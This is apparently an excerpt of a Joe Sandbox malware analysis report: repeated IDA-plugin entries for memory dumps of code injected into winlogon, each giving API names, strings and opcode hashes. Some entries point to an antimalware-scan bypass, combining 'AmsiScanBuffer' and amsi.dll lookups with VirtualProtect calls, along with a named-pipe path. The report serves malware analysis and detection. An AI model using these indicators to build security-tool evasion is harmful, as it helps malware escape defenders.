                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: 248fa20dc5e5731d0a45531c9fc02e3cf2116f6a823abd7b6d22970c9a0795b1
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: 9FF03A71225B82C1FB149B24E8953AEB361EF897A4F98063ADE6E465E4DF2DC449C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 6a5f03583955f5ac3b62c5336c9814536ee6e00dbb4c061b133e4b297d55b5e1
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: FDF03474224BC1D2EA148B22F9141AEB362AF48FC4F888032EE0E47B18CE28C445C600
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 4c24b7813e7dbf569234149e9e23c0d50a4987cd2f51bf90a48020a53b489a7a
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 00D06730676A80DAEB08BB11EC593ECBB61BF64B01FC40437CD0E452A0DE2E855A8350
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: b075b644ca28e85cf18d862439597091811fc2f830510fb9260ce46a939d10b5
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 1AD06730732680D6EA0E7B11EC957DCB661AF64B02FD5443BDD0E052A4DE2C89698340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: 660dd2d31926f5b18437a79e6133f597c173c08b53623139616d374135ae0f44
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: 2502963622DBC4CAEB608B55E49439EB7A1F7C4795F104126EA8E87BA9DF7CC454CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: dda00b88d7764353b75136d53596f0d2034c14ab385f9c12ccccb40bc54c7cfa
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: E5029736629BC4C6E7608B55E49039EFBA0F7C5794F104126EA8E87BA9DF7CC494CB01
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: 9bdb210ca78f57e2b3e5fea9c1ca397dc87d4bd895cacbbd9e6f8d35d8661203
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: A0517C36728681CBE764DB56E844A9EF3A0FB88B85F50413A9E4E43B54DF79C846CB04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: d3db7cefbc3e86044cf3587eee183b234b7acc7443da282d1202c0cc0bf82598
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: B7518C36224681C7E365DB56E840AEEF7A4FB88B84F50413AEE8E43B54DF78C855CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: 2f63112844cbc2e4d72248b1ec1313bf988cab21f2188793efe6fc02baab0213
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: BD519D36628691CBE724DF66E8446AEF3A0FB89B85F50413ADE4E43754DF39C806CB04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: 3094027432e7651b27e26747100f65a4766cdb78a45eab800a4c3c54a154b69b
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: 94517C36624681C7E729DF56E880AAEF7A4FB89B84F54413AEE4E43754DF38D815CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: ff61565b459b6cc4ab6afef8effed460c476408cc25a755e61abc6a78ae714e4
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: 85516C36624682CBE724DF56E840AAEF3A1FB89B84F50413ADE4E43794DF38D945CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 576a4d25cb2ad3d533d364ac3980ec066066a7ad36a4f2dfa656199a3bc43cec
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: 5161763652DA84CAEB608B16E45435EF7A0F788749F501226EE8E47BA9DF7CC540CF04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction ID: 463089987c8f33a1eb9d2aed1d740f750a7ad82977d9c8faaeebddfdef60c928
                                                                      • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                                      • Instruction Fuzzy Hash: 98619636529A84C7E7619B15E45439EFBA0FB88744F10062AEE8E87BA8DF7CC550CF01
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                                      • Instruction ID: 6980eca10f1382f52b9f150357733d7a3c2863ef27a8fe3d946ba6cb92b3e9e2
                                                                      • Opcode Fuzzy Hash: 9064501d9207191e0a03e88cf4adaad404ffb1d761ed384ef498a641ed770bed
                                                                      • Instruction Fuzzy Hash: 9A619536529A85C6EB608B16E55479EF7A0FB88744F100226FE8E87BA8DF7DC544CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: cc01f2034c2efd82d260d9635d36fca58b9a9f6ac50cde372b3707fc042de3d5
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: 8111D736619780D7EB24DB21E44429EB7B0FB45B85F040136DE4D437A8EF7EC9548784
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID:
                                                                      • API String ID: 1092925422-0
                                                                      • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction ID: a582791d24fc43e43578601c567f0dbbeaf6fd20d84333e7a46761feeb2361dd
                                                                      • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                                      • Instruction Fuzzy Hash: FA111936625780D3EB258B21E44469EBBB0FF44B80F080436DE4D037A8EF7EC9648784
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 233396c1188e743c42982e0f32550efa5805655bcd7fbaf50f6c76a6605437ae
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 18518D32229A80CEDB54DB15E449BECB791EB98BD9F148136EE4E57B88DF79C841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 60e3ffb63d7929ec38420ae6f94f9aade0c22905a6a4ad2baba141073c9dcc50
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 8851DF32321A80CBEB54DB55E445BECBB91EB54B98F158136DE8E57B88DF78C8A1C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2395640692-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: c58bdb417acd5e09c80ce1f1c2e610612fa4b6b3262c9fb971c576ef81a4499d
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: 1951AC32321A82CBEB54DB15E445BEDB792EB54B98F148132EE4E57B89DF78C841CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
